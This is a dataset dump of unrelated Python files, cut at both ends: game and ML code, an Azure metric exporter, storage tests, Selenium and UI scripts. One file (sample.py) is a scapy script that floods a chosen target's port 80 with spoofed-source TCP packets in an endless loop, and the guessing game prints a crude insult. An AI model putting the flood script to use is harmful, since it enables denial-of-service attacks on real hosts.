xs.shape[1:]\npolicy_shape = ps.shape[1:]\npi_output_count = np.prod(policy_shape)\n\nif NETWORK==\"original\":\n inputs = keras.Input(shape=input_shape)\n outputs = inputs\n outputs = layers.Conv2D(NUM_CHANNELS, KERNEL_SIZE, padding=\"same\")(outputs)\n if BATCHNORM: outputs = tf.keras.layers.BatchNormalization()(outputs)\n outputs = layers.Activation(tf.nn.relu)(outputs)\n outputs = layers.Conv2D(NUM_CHANNELS, KERNEL_SIZE, padding=\"same\")(outputs)\n if BATCHNORM: outputs = 
tf.keras.layers.BatchNormalization()(outputs)\n outputs = layers.Activation(tf.nn.relu)(outputs)\n outputs = layers.Conv2D(NUM_CHANNELS, KERNEL_SIZE, padding=\"same\", strides=(2,1))(outputs)\n if BATCHNORM: outputs = tf.keras.layers.BatchNormalization()(outputs)\n outputs = layers.Activation(tf.nn.relu)(outputs)\n outputs = layers.Conv2D(NUM_CHANNELS, KERNEL_SIZE, padding=\"same\", strides=(2,2))(outputs)\n if BATCHNORM: outputs = tf.keras.layers.BatchNormalization()(outputs)\n outputs = layers.Activation(tf.nn.relu)(outputs)\n outputs = layers.Flatten()(outputs)\n\n outputs_flat = layers.Flatten()(inputs)\n outputs_flat = layers.Dense(1512)(outputs_flat)\n if BATCHNORM: outputs = tf.keras.layers.BatchNormalization()(outputs)\n outputs = layers.Activation(tf.nn.relu)(outputs)\n outputs_flat = layers.Dropout(DROPOUT_RATE)(outputs_flat)\n outputs_flat = layers.Dense(1256)(outputs_flat)\n if BATCHNORM: outputs = tf.keras.layers.BatchNormalization()(outputs)\n outputs = layers.Activation(tf.nn.relu)(outputs)\n outputs_flat = layers.Dropout(DROPOUT_RATE)(outputs_flat)\n\n outputs = layers.Concatenate(axis=1)([outputs_flat, outputs])\n outputs = layers.Dense(1024)(outputs)\n outputs = layers.Dropout(DROPOUT_RATE)(outputs)\n if BATCHNORM: outputs = tf.keras.layers.BatchNormalization()(outputs)\n outputs = layers.Activation(tf.nn.relu)(outputs)\n outputs = layers.Dense(512)(outputs)\n outputs = layers.Dropout(DROPOUT_RATE)(outputs)\n if BATCHNORM: outputs = tf.keras.layers.BatchNormalization()(outputs)\n outputs = layers.Activation(tf.nn.relu)(outputs)\n pi = layers.Dense(pi_output_count, name=\"policy\")(outputs)\n v0 = layers.Dense(1)(outputs)\n v = layers.Activation(tf.math.tanh, name=\"value\")(v0)\n model = keras.Model(inputs=inputs, outputs=(pi, v))\nelif NETWORK==\"linear\":\n inputs = keras.Input(shape=input_shape)\n pi = layers.Conv2D(1, (1,1), padding=\"same\", name=\"conv1\")(inputs)\n pi = layers.Flatten(name=\"policy\")(pi)\n v = layers.Flatten()(inputs)\n # v = layers.Dense(1, activation=\"relu\")(v)\n v = layers.Dense(1)(v)\n v = layers.Activation(tf.math.tanh, name=\"value\")(v)\n model = keras.Model(inputs=inputs, outputs=(pi, v))\nelif NETWORK==\"linear2\":\n inputs = keras.Input(shape=input_shape)\n pi = layers.Conv2D(10, (1,1), padding=\"same\", name=\"conv1\", activation=\"relu\")(inputs)\n pi = layers.Conv2D(1, (1,1), padding=\"same\", name=\"conv2\")(pi)\n pi = layers.Flatten(name=\"policy\")(pi)\n v = layers.Flatten()(inputs)\n # v = layers.Dense(1, activation=\"relu\")(v)\n v = layers.Dense(1)(v)\n v = layers.Activation(tf.math.tanh, name=\"value\")(v)\n model = keras.Model(inputs=inputs, outputs=(pi, v))\nelif NETWORK==\"local\":\n inputs = keras.Input(shape=input_shape)\n outputs = layers.Conv2D(1, (3,3), padding=\"same\", name=\"conv1\")(inputs)\n pi = layers.Flatten(name=\"policy\")(outputs)\n v0 = layers.Dense(1)(pi)\n v = layers.Activation(tf.math.tanh, name=\"value\")(v0)\n model = keras.Model(inputs=inputs, outputs=(pi, v))\n \n# elif NETWORK==\"dense\": # todo two heads\n# model = keras.Sequential([\n# keras.layers.Flatten(input_shape=input_shape),\n# keras.layers.Dense(1128, activation='relu'),\n# keras.layers.Dense(1256, activation='relu'),\n# keras.layers.Dense(1128, activation='relu'),\n# keras.layers.Dense(output_count),\n# keras.layers.Reshape(output_shape)\n# ])\n\n\n \nloss = {\n \"policy\": keras.losses.CategoricalCrossentropy(from_logits=True),\n \"value\": keras.losses.MeanSquaredError(),\n}\nloss_weights = {\n \"policy\": 1,\n \"value\": 
10,\n}\nmetrics = {\n \"policy\": ['categorical_accuracy',\n keras.metrics.TopKCategoricalAccuracy(2, \"top2\"),\n keras.metrics.TopKCategoricalAccuracy(3, \"top3\"),\n keras.metrics.TopKCategoricalAccuracy(4, \"top4\"),\n keras.metrics.TopKCategoricalAccuracy(5, \"top5\")],\n \"value\": 'mse',\n}\n\n# prob = layers.Softmax()(pi)\n# model = keras.Model(inputs=inputs, outputs=prob)\n# loss = keras.losses.MeanSquaredError()\n\nmodel.compile(optimizer=\"adam\",\n loss=loss,\n loss_weights=loss_weights,\n metrics=metrics\n)\n\nmodel.fit(xs, (ps, vs), epochs=EPOCHS, batch_size=BATCH_SIZE, validation_split=SPLIT, verbose=2)\n\nmylayer = model.get_layer(name=\"conv1\")\nmyweights = mylayer.trainable_weights[0]\nmyweights = myweights.numpy()[:,:,:,0]\nprint(myweights.shape)\nfor i in range(11):\n print(\"Filter \", i)\n print(myweights[:,:,i])\n\n\n\nclass Model_Arena:\n def get_input_for_model(self, board, player):\n mtx = self.heuristic.get_field_stregth_mtx(board, 1)\n heuristic_components = self.heuristic.get_x_line_mtx(board, 1)\n shape = list(np.shape(board))+[1]\n white_board = board * (board+1) -1\n black_board = board * (board-1) -1\n player_channel = player*np.ones(shape)\n new_board = np.concatenate([np.reshape(white_board,shape),np.reshape(black_board,shape),\n np.reshape(mtx, shape),\n heuristic_components,\n player_channel], axis=2)\n return new_board\n\n def model_player(self,b,p, model):\n board = np.array([self.get_input_for_model(b, p)])\n valids = self.game.getValidMoves(b, 1)\n \n probs = model.predict(board)[0][0]\n move = np.argmax(probs*valids+valids*0.00001)\n #print(probs, move)\n return move\n \n def __init__(self, model):\n self.game = GobangGame(col=12, row=4, nir=7, defender=-1)\n self.heuristic = Heuristic(self.game)\n #heuristic_player = Heuristic(self.game).random_play\n heuristic_player = Heuristic(self.game).play\n model_player = lambda b, p: Model_Arena.model_player(self,b,p,model)\n self.arena = Arena.Arena(model_player, heuristic_player, self.game, display=display)\n\n def play(self, number_of_games=100):\n return self.arena.playGames(number_of_games, verbose=True) \n\nif 1:\n # === Ugly hack for reaching parent directory packages ===\n from inspect import getsourcefile\n import os.path\n import sys\n \n current_path = os.path.abspath(getsourcefile(lambda:0))\n current_dir = os.path.dirname(current_path)\n parent_dir = current_dir[:current_dir.rfind(os.path.sep)]\n\n sys.path.insert(0, parent_dir)\n # ========================================================\n\n import Arena\n from gobang.GobangGame import GobangGame, display\n from gobang.GobangPlayers import *\n from gobang.tensorflow.NNet import NNetWrapper as NNet\n\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = '0'\n\n #set gpu memory grow\n config = tf.compat.v1.ConfigProto() \n config.gpu_options.allow_growth=True \n sess = tf.compat.v1.Session(config=config)\n\n arena = Model_Arena(model)\n print(arena.play())\n","sub_path":"supervised/supervised.py","file_name":"supervised.py","file_ext":"py","file_size_in_byte":11869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
{"seq_id":"642244556","text":"'''\nProject: Project Diamond\nTeam Team 2\nApp 3 Hashin\n'''\nimport json, sys, base64, logging, gzip, shutil\nfrom App5.curlfeed import CurlFeed\nclass App3JsonCompress:\n '''\n Create the compressed file\n '''\n logging.basicConfig(filename='App3JsonCompress.log', level = logging.ERROR)\n mlocation = ''\n olocation = ''\n\n def __init__(self,read,output):\n '''\n Params 
read - read file location or name\n Params output - output file location or name\n '''\n\n self.mlocation = read\n self.olocation = output\n\n def CompressFile(self):\n '''\n Compress the text file \n '''\n try :\n with open(self.mlocation,'rb') as f_in:\n with gzip.open(self.olocation,'wb') as f_out:\n print(\"Now compressing the JSON Payload\")\n shutil.copyfileobj(f_in, f_out)\n print(\"The file has been compressed\")\n curlFeed = CurlFeed(\"App3\", \"Success\", \"Compressed JSON file\")\n curlFeed.send()\n return True\n except:\n e = sys.exc_info()[0]\n logging.error(e)\n curlFeed = CurlFeed(\"App3\", \"Failed\", e)\n curlFeed.send()\n raise\n\n def getRead(self):\n '''\n Get the read location\n '''\n return self.mlocation\n\n def getOutput(self):\n '''\n Get the output location \n '''\n return self.olocation\n\n","sub_path":"IST411_Distributed_Object_Computing/Project_Diamond/App3/app3JsonCompress.py","file_name":"app3JsonCompress.py","file_ext":"py","file_size_in_byte":1470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
{"seq_id":"194589728","text":"from random import random\nnum_ran=int(random()*20)\nguess=False\n\nprint(\"\"\"Welcome to this game,\nhere you must guess a number between 0 and 20\"\"\")\nwhile not guess:\n character=input(\"Please type a number \")\n if not character.isdigit():\n print(\"invalid characters\")\n else:\n number=int(character)\n if number<0 or number>20:\n print(\"your number must be between 0 and 20\") \n elif number==num_ran:\n guess=True;\n elif number<num_ran:\n print(\"your number is less\")\n elif number>num_ran:\n print(\"your number is greater\")\nprint(\"congratulations, you guessed \\nPD: Orlando es puto\")\n \n","sub_path":"testRandom.py","file_name":"testRandom.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
{"seq_id":"602938685","text":"from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nimport time\n\ndriver = webdriver.Chrome(executable_path=\"D:\\Drivers\\chromedriver_win32\\chromedriver.exe\")\n\ndriver.get(\"http://demo.automationtesting.in/Windows.html\")\n\nprint(driver.title) #returns the page title\n\nprint(driver.current_url) #returns url of page\n\ndriver.find_element_by_xpath(\"//*[@id='Tabbed']/a/button\").click()\n\ntime.sleep(5)\n\n#driver.close() will close only current browser\n\ndriver.quit() #will close all browsers","sub_path":"SeleniumSessions/BasicCommands.py","file_name":"BasicCommands.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
{"seq_id":"538263298","text":"# Copyright (c) Microsoft Corporation. 
All rights reserved.\n# Licensed under the MIT License.\nimport logging\n\nfrom typing import Optional, Any\n\nfrom opentelemetry.sdk.metrics.export import (\n DataPointT,\n HistogramDataPoint,\n MetricExporter,\n MetricExportResult,\n MetricsData as OTMetricsData,\n NumberDataPoint,\n)\nfrom opentelemetry.sdk.resources import Resource\nfrom opentelemetry.sdk.util.instrumentation import InstrumentationScope\n\nfrom azure.monitor.opentelemetry.exporter import _utils\nfrom azure.monitor.opentelemetry.exporter._generated.models import (\n MetricDataPoint,\n MetricsData,\n MonitorBase,\n TelemetryItem,\n)\nfrom azure.monitor.opentelemetry.exporter.export._base import (\n BaseExporter,\n ExportResult,\n)\n\n_logger = logging.getLogger(__name__)\n\n__all__ = [\"AzureMonitorMetricExporter\"]\n\n\nclass AzureMonitorMetricExporter(BaseExporter, MetricExporter):\n \"\"\"Azure Monitor Metric exporter for OpenTelemetry.\"\"\"\n\n def __init__(self, **kwargs: Any) -> None:\n BaseExporter.__init__(self, **kwargs)\n MetricExporter.__init__(\n self,\n preferred_temporality=kwargs.get(\"preferred_temporality\"),\n preferred_aggregation=kwargs.get(\"preferred_aggregation\"),\n )\n\n def export(\n self,\n metrics_data: OTMetricsData,\n timeout_millis: float = 10_000, # pylint: disable=unused-argument\n **kwargs: Any, # pylint: disable=unused-argument\n ) -> MetricExportResult:\n \"\"\"Exports a batch of metric data\n :param metrics_data: Open Telemetry Metric(s) to export.\n :type metrics_data: Sequence[~opentelemetry.sdk.metrics._internal.point.MetricsData]\n :rtype: ~opentelemetry.sdk.metrics.export.MetricExportResult\n \"\"\"\n envelopes = []\n if metrics_data is None:\n return MetricExportResult.SUCCESS\n for resource_metric in metrics_data.resource_metrics:\n for scope_metric in resource_metric.scope_metrics:\n for metric in scope_metric.metrics:\n for point in metric.data.data_points:\n if point is not None:\n envelopes.append(\n self._point_to_envelope(\n point,\n metric.name,\n resource_metric.resource,\n scope_metric.scope\n )\n )\n try:\n result = self._transmit(envelopes)\n self._handle_transmit_from_storage(envelopes, result)\n return _get_metric_export_result(result)\n except Exception: # pylint: disable=broad-except\n _logger.exception(\"Exception occurred while exporting the data.\")\n return _get_metric_export_result(ExportResult.FAILED_NOT_RETRYABLE)\n\n def force_flush(\n self,\n timeout_millis: float = 10_000,\n ) -> bool:\n \"\"\"\n Ensure that export of any metrics currently received by the exporter\n are completed as soon as possible.\n \"\"\"\n return True\n\n def shutdown(\n self,\n timeout_millis: float = 30_000, # pylint: disable=unused-argument\n **kwargs: Any, # pylint: disable=unused-argument\n ) -> None:\n \"\"\"Shuts down the exporter.\n\n Called when the SDK is shut down.\n \"\"\"\n self.storage.close()\n\n def _point_to_envelope(\n self,\n point: DataPointT,\n name: str,\n resource: Optional[Resource] = None,\n scope: Optional[InstrumentationScope] = None\n ) -> TelemetryItem:\n envelope = _convert_point_to_envelope(point, name, resource, scope)\n envelope.instrumentation_key = self._instrumentation_key\n return envelope\n\n @classmethod\n def from_connection_string(\n cls, conn_str: str, **kwargs: Any\n ) -> \"AzureMonitorMetricExporter\":\n \"\"\"\n Create an AzureMonitorMetricExporter from a connection string.\n\n This is the recommended way of instantiation if a connection string is passed in explicitly.\n If a user wants to use a connection string provided by environment 
variable, the constructor\n of the exporter can be called directly.\n\n :param str conn_str: The connection string to be used for authentication.\n :keyword str api_version: The service API version used. Defaults to latest.\n :returns: An instance of ~AzureMonitorMetricExporter\n \"\"\"\n return cls(connection_string=conn_str, **kwargs)\n\n\n# pylint: disable=protected-access\ndef _convert_point_to_envelope(\n point: DataPointT,\n name: str,\n resource: Optional[Resource] = None,\n scope: Optional[InstrumentationScope] = None\n) -> TelemetryItem:\n envelope = _utils._create_telemetry_item(point.time_unix_nano)\n envelope.name = \"Microsoft.ApplicationInsights.Metric\"\n envelope.tags.update(_utils._populate_part_a_fields(resource))\n namespace = None\n if scope is not None:\n namespace = scope.name\n value = 0\n count = 1\n min_ = None\n max_ = None\n # std_dev = None\n\n if isinstance(point, NumberDataPoint):\n value = point.value\n elif isinstance(point, HistogramDataPoint):\n value = point.sum\n count = int(point.count)\n min_ = point.min\n max_ = point.max\n\n data_point = MetricDataPoint(\n name=str(name)[:1024],\n namespace=str(namespace)[:256],\n value=value,\n count=count,\n min=min_,\n max=max_,\n )\n properties = _utils._filter_custom_properties(point.attributes)\n data = MetricsData(\n properties=properties,\n metrics=[data_point],\n )\n\n envelope.data = MonitorBase(base_data=data, base_type=\"MetricData\")\n\n return envelope\n\n\ndef _get_metric_export_result(result: ExportResult) -> MetricExportResult:\n if result == ExportResult.SUCCESS:\n return MetricExportResult.SUCCESS\n if result in (\n ExportResult.FAILED_RETRYABLE,\n ExportResult.FAILED_NOT_RETRYABLE,\n ):\n return MetricExportResult.FAILURE\n return None\n","sub_path":"sdk/monitor/azure-monitor-opentelemetry-exporter/azure/monitor/opentelemetry/exporter/export/metrics/_exporter.py","file_name":"_exporter.py","file_ext":"py","file_size_in_byte":6177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
{"seq_id":"336070860","text":"##This Script is for ITIM NA ARKO only\r\n########BOROD#######\r\n########BANING######\r\n########BAJOHN######\r\n\r\n\r\n\r\nfrom scapy.all import *\r\n\r\n##This Script is for ITIM NA ARKO only\r\n########BOROD#######\r\n########BANING######\r\n########BAJOHN######\r\n\r\nsource_IP = input(\"Enter IP address of Source: \")\r\ntarget_IP = input(\"Enter IP address of Target: \")\r\nsource_port = int(input(\"Enter Source Port Number:\"))\r\ni = 1\r\n\r\nwhile True:\r\n IP1 = IP(src=source_IP, dst=target_IP)\r\n TCP1 = TCP(sport=source_port, dport=80)\r\n pkt = IP1 / TCP1\r\n send(pkt, inter=.001)\r\n\r\n print(\"packet sent \", i)\r\n i = i + 1\r\n","sub_path":"sample.py","file_name":"sample.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
{"seq_id":"127851203","text":"import sys, time, json, os.path, os, subprocess, queue, threading, traceback\nos.environ[\"QT_IM_MODULE\"] = \"qtvirtualkeyboard\"\nfrom signal import signal, SIGINT, SIGTERM\nfrom time import sleep\nfrom sys import exit\nfrom collections import OrderedDict\n# import random\nfrom PySide2.QtGui import QGuiApplication\nfrom PySide2.QtCore import QObject, QUrl, Slot, QStringListModel, Property, Signal, QTimer, QThreadPool, QRunnable\nfrom PySide2.QtQml import QQmlApplicationEngine, qmlRegisterType\nfrom PySide2.QtGui import QIcon\n# # compiled QML files, compile with pyside2-rcc\n# 
import qml.qml\n\nos.environ[\"QT_IM_MODULE\"] = \"qtvirtualkeyboard\"\nimport icons.icons\n# #, imagine_assets\nimport resource_rc\n\nEXIT_PROCESS = [False]\n# import patch_bay_model\n\n\ncurrent_source_port = None\n# current_effects = OrderedDict()\ncurrent_effects = {}\n# current_effects[\"delay1\"] = {\"x\": 20, \"y\": 30, \"effect_type\": \"delay\", \"controls\": {}, \"highlight\": False}\n# current_effects[\"delay2\"] = {\"x\": 250, \"y\": 290, \"effect_type\": \"delay\", \"controls\": {}, \"highlight\": False}\nport_connections = {} # key is port, value is list of ports\n\ncontext = None\n\n\nif __name__ == \"__main__\":\n\n print(\"in Main\")\n app = QGuiApplication(sys.argv)\n QIcon.setThemeName(\"digit\")\n # Instantiate the Python object.\n # knobs = Knobs()\n\n # update_counter = PolyValue(\"update counter\", 0, 0, 500000)\n # read persistant state\n # pedal_state = {}\n # with open(\"/pedal_state/state.json\") as f:\n # pedal_state = json.load(f)\n # current_bpm = PolyValue(\"BPM\", 120, 30, 250) # bit of a hack\n # current_preset = PolyValue(\"Default Preset\", 0, 0, 127)\n # update_counter = PolyValue(\"update counter\", 0, 0, 500000)\n # command_status = [PolyValue(\"command status\", -1, -10, 100000), PolyValue(\"command status\", -1, -10, 100000)]\n # delay_num_bars = PolyValue(\"Num bars\", 1, 1, 16)\n # midi_channel = PolyValue(\"channel\", pedal_state[\"midi_channel\"], 1, 16)\n # input_level = PolyValue(\"input level\", pedal_state[\"input_level\"], -80, 10)\n # knobs.set_input_level(pedal_state[\"input_level\"], write=False)\n\n # available_effects = QStringListModel()\n # available_effects.setStringList(list(effect_type_map.keys()))\n engine = QQmlApplicationEngine()\n\n # qmlRegisterType(patch_bay_model.PatchBayModel, 'Poly', 1, 0, 'PatchBayModel')\n # Expose the object to QML.\n # global context\n context = engine.rootContext()\n # context.setContextProperty(\"knobs\", knobs)\n # context.setContextProperty(\"available_effects\", available_effects)\n # context.setContextProperty(\"selectedEffectPorts\", selected_effect_ports)\n # context.setContextProperty(\"portConnections\", port_connections)\n # context.setContextProperty(\"effectPrototypes\", effect_prototypes)\n # context.setContextProperty(\"updateCounter\", update_counter)\n # context.setContextProperty(\"currentBPM\", current_bpm)\n # # context.setContextProperty(\"pluginState\", plugin_state)\n # context.setContextProperty(\"currentPreset\", current_preset)\n # context.setContextProperty(\"commandStatus\", command_status)\n # context.setContextProperty(\"delayNumBars\", delay_num_bars)\n # context.setContextProperty(\"midiChannel\", midi_channel)\n # context.setContextProperty(\"isLoading\", is_loading)\n # # context.setContextProperty(\"inputLevel\", input_level)\n # context.setContextProperty(\"presetList\", preset_list_model)\n # print(\"starting recv thread\")\n engine.load(QUrl(\"qml/TestWrapper.qml\"))\n # ingen_wrapper.start_recv_thread(ui_messages)\n # print(\"starting send thread\")\n # ingen_wrapper.start_send_thread()\n # try:\n # add_io()\n # except Exception as e:\n # print(\"########## e is:\", e)\n # ex_type, ex_value, tb = sys.exc_info()\n # error = ex_type, ex_value, ''.join(traceback.format_tb(tb))\n # print(\"EXception is:\", error)\n # sys.exit()\n\n # sys._excepthook = sys.excepthook\n # def exception_hook(exctype, value, traceback):\n # print(\"except hook got a thing!\")\n # sys._excepthook(exctype, value, traceback)\n # sys.exit(1)\n # sys.excepthook = exception_hook\n # try:\n # 
crash_here\n # except:\n # print(\"caught crash\")\n # timer = QTimer()\n # timer.timeout.connect(tick)\n # timer.start(1000)\n\n def signalHandler(sig, frame):\n if sig in (SIGINT, SIGTERM):\n # print(\"frontend got signal\")\n # global EXIT_PROCESS\n EXIT_PROCESS[0] = True\n # ingen_wrapper._FINISH = True\n signal(SIGINT, signalHandler)\n signal(SIGTERM, signalHandler)\n # initial_preset = False\n print(\"starting UI\")\n while not EXIT_PROCESS[0]:\n # debug_print(\"processing events\")\n try:\n app.processEvents()\n # debug_print(\"processing ui messages\")\n except Exception as e:\n qCritical(\"########## e is:\"+ str(e))\n ex_type, ex_value, tb = sys.exc_info()\n error = ex_type, ex_value, ''.join(traceback.format_tb(tb))\n # debug_print(\"EXception is:\", error)\n sys.exit()\n sleep(0.01)\n\n qWarning(\"mainloop exited\")\n app.exit()\n sys.exit()\n qWarning(\"sys exit called\")\n","sub_path":"show_single_widget.py","file_name":"show_single_widget.py","file_ext":"py","file_size_in_byte":5205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"32803799","text":"import subprocess\nfrom\ttermcolor import colored\n\nproc = subprocess.Popen(['git', 'status', \"--porcelain\"], stdout=subprocess.PIPE)\noutput = proc.stdout.read()\noutput = str(output, 'utf-8').split('\\n')\n\nsubprocess.call([\"rm\", \"-f\", \"./.git/index.lock\"])\n\nfiles_to_push = []\nfor single_out in output:\n\ttemp = single_out.split(' ')\n\tif '??' in temp[0]:\n\t\tfiles_to_push.append(temp[1])\n\nfor file in files_to_push:\n\tcmd = \"git add \" + file\n\ttry:\n\t\tsubprocess.Popen([\"git\", \"add\", file], stdout=subprocess.PIPE)\n\t\toutput = proc.stdout.read()\n\texcept:\n\t\tprint(colored(\"The File\", \"white\"), end=\" \")\n\t\tprint(colored(f\"[{file}]\", \"yellow\"), end=\" \")\n\t\tprint(colored(\"Added\", \"white\"), end=\" \")\n\t\tprint(colored(\"=> Failed\", \"red\"))\n\ttry:\n\t\tcmd = 'add solution of ' + file.replace('_', ' ').split('.')[0] + ' problem'\n\t\tsubprocess.Popen([\"git\", \"commit\", \"-m\", cmd], stdout=subprocess.PIPE)\n\t\toutput = proc.stdout.read()\n\texcept:\n\t\tprint(colored(\"The File\", \"white\"), end=\" \")\n\t\tprint(colored(f\"[{file}]\", \"yellow\"), end=\" \")\n\t\tprint(colored(\"Commited\", \"white\"), end=\" \")\n\t\tprint(colored(\"=> Failed\", \"red\"))\n\n\tprint(colored(\"The File\", \"white\"), end=\" \")\n\tprint(colored(f\"[{file}]\", \"yellow\"), end=\" \")\n\tprint(colored(\"Added and Commited\", \"white\"), end=\" \")\n\tprint(colored(\"=> SUCCESS\", \"green\"))\n\n","sub_path":"push.py","file_name":"push.py","file_ext":"py","file_size_in_byte":1290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"215669654","text":"# Writing the mean.py file\ndef mean(num_list):\n #assert type(num_list) == list\n #if len(num_list) == 0:\n # raise Exception(\"the list has length of 0\")\n #assert len(num_list) != 0 \n try:\n return sum(num_list)/len(num_list)\n except ZeroDivisionError:\n return 0\n except TypeError as detail:\n msg = \"must have list of numbers\"\n raise TypeError(detail.__str__() + \"\\n\" + msg)\n","sub_path":"mean.py","file_name":"mean.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"593917097","text":"from listas import LinkedList\r\n\r\nl = LinkedList()\r\nprint(f\"L esta vacía? 
{l.is_empty()}\")\r\nl.append(10)\r\nl.append(5)\r\nl.append(6)\r\nl.append(20)\r\nl.append(22)\r\n\r\nprint(f\"L está vacía? {l.is_empty()}\")\r\n\r\nl.transversal()\r\nl.remove(10)\r\nl.transversal()\r\nl.preppend(3)\r\nl.transversal()\r\nprint(l.get())\r\nprint(l.get(2))\r\nprint(l.get(0))\r\n","sub_path":"pruebas_listas.py","file_name":"pruebas_listas.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"180019907","text":"from itertools import product\n\nimport pytest\n\nfrom lakota import Repo, Schema\nfrom lakota.pod import MemPOD\nfrom lakota.utils import chunky\n\nLABELS = \"zero one two three four five six seven eight nine\".split()\nSCHEMA = Schema(timestamp=\"int *\", value=\"float\")\n\n\n@pytest.fixture\ndef repo():\n return Repo(pod=MemPOD(\".\"))\n\n\n@pytest.mark.parametrize(\"squash\", [True, False])\ndef test_create_collections(repo, squash):\n \"\"\"\n Create all labels in one go\n \"\"\"\n\n base_labels = [\"b\", \"c\", \"e\"]\n repo.create_collection(SCHEMA, *base_labels)\n\n # Test that we can get back those series\n for label in base_labels:\n collection = repo / label\n assert collection.label == label\n\n # Test double creation\n repo.create_collection(SCHEMA, *base_labels)\n assert sorted(repo.ls()) == sorted(base_labels)\n\n # Add 'a' (first), 'f' (last) and 'd' (middle)\n repo.create_collection(SCHEMA, \"a\")\n expected = list(\"abce\")\n assert repo.ls() == expected\n\n repo.create_collection(SCHEMA, \"f\")\n expected = list(\"abcef\")\n assert repo.ls() == expected\n\n if squash:\n repo.registry.squash()\n\n repo.create_collection(SCHEMA, \"d\")\n expected = list(\"abcdef\")\n assert repo.ls() == expected\n\n\n@pytest.mark.parametrize(\"merge\", [True, False])\ndef test_create_labels_chunks(repo, merge):\n \"\"\"\n Create all labels in chunks\n \"\"\"\n for label_chunk in chunky(LABELS, 3):\n repo.create_collection(SCHEMA, *label_chunk)\n\n # Test that we can get back those series\n for label in LABELS:\n coll = repo / label\n assert coll.label == label\n\n # Same after merge\n if merge:\n repo.merge()\n for label in LABELS:\n coll = repo / label\n assert coll.label == label\n\n\n@pytest.mark.parametrize(\n \"squash,once,to_delete\",\n product(\n [True, False],\n [True, False],\n [[\"eight\"], [\"zero\"], [\"eight\", \"zero\"], [\"seven\"], [\"foobar\"]],\n ),\n)\ndef test_delete(repo, squash, once, to_delete):\n if once:\n repo.create_collection(SCHEMA, *LABELS)\n else:\n for label in LABELS:\n repo.create_collection(SCHEMA, label)\n expected = sorted(LABELS)\n assert repo.ls() == expected\n\n # Remove one or more label and check result\n repo.delete(*to_delete)\n if squash:\n repo.registry.squash()\n expected = [l for l in expected if l not in to_delete]\n assert repo.ls() == expected\n for label in to_delete:\n assert repo / label is None\n\n\n@pytest.mark.parametrize(\"merge\", [True, False])\ndef test_delete_and_recreate(repo, merge):\n clct = repo.create_collection(SCHEMA, \"test_coll\")\n series = clct / \"test_series\"\n series.write(\n {\n \"timestamp\": [1, 2, 3],\n \"value\": [1, 2, 3],\n }\n )\n\n # Delete & re-create\n repo.delete(\"test_coll\")\n if merge:\n repo.merge()\n clct = repo.create_collection(SCHEMA, \"test_coll\")\n assert list(clct) == []\n\n\ndef test_label_regexp():\n repo = Repo()\n ok = [\"abc\", \"abc-abc-123\", \"abc_abc-123.45\", \"abc+abc\", \"$\", \"é\"]\n for label in ok:\n repo.create_collection(SCHEMA, label)\n 
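 # upper-case variants of valid labels must be accepted as well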
repo.create_collection(SCHEMA, label.upper())\n\n not_ok = [\"\", \"\\t\", \"\\n\"]\n for label in not_ok:\n with pytest.raises(ValueError):\n repo.create_collection(SCHEMA, label)\n with pytest.raises(ValueError):\n repo.create_collection(SCHEMA, label + \" \")\n\n\n@pytest.mark.parametrize(\"large\", [True, False])\ndef test_gc(repo, large):\n # Because we auto-embed small arrays in commit, we have to test\n # both small and big arrays.\n\n coll = repo.create_collection(SCHEMA, \"a_collection\")\n size = 100_000 if large else 10\n\n for offset, label in enumerate((\"label_a\", \"label_b\")):\n series = coll / label\n for i in range(offset, offset + 10):\n series.write(\n {\n \"timestamp\": range(i, i + size),\n \"value\": range(i + 100, i + 100 + size),\n }\n )\n\n # Merge label_a\n coll = repo / \"a_collection\"\n coll.merge()\n\n # Launch garbage collection\n count = repo.gc()\n assert count == 0\n\n # Read back data\n coll = repo / \"a_collection\"\n assert coll.ls() == [\"label_a\", \"label_b\"]\n\n\ndef test_refresh():\n pod = MemPOD(\".\")\n repo = Repo(pod=pod)\n\n repo.create_collection(SCHEMA, \"collection\")\n assert repo.ls() == [\"collection\"]\n repo2 = Repo(pod=pod)\n repo2.delete(\"collection\")\n # repo is out of sync\n assert repo.ls() == [\"collection\"]\n # refresh slove ths\n repo.refresh()\n assert repo.ls() == []\n\n\ndef test_rename(repo):\n frm = {\n \"timestamp\": [1, 2, 3],\n \"value\": [1, 2, 3],\n }\n # Rename collection\n repo.create_collection(SCHEMA, \"A\", \"B\", \"C\")\n srs = repo / \"A\" / \"a\"\n srs.write(frm)\n repo.rename(\"A\", \"D\")\n\n # Make sure series are still there\n srs = repo / \"D\" / \"a\"\n assert srs.frame() == frm\n\n # Rename to an existing label is not supported\n assert repo.ls() == [\"B\", \"C\", \"D\"]\n with pytest.raises(ValueError):\n repo.rename(\"B\", \"C\")\n","sub_path":"tests/repo_test.py","file_name":"repo_test.py","file_ext":"py","file_size_in_byte":5145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"507975956","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.colors import LogNorm\nimport time\nimport sys\n\ndef get_map(frame, lowlim=0, uplim=1000,frac=1):\n t0=time.time()\n windowlength=270\n leftside=50\n heatMap=np.zeros((windowlength,uplim))\n nFrames=int(len(frame)*frac)\n for n in range(0, nFrames):\n crossing=frame.refpoint[n]\n if n%10 == 0 and n>0:\n t = time.time()\n ETA = 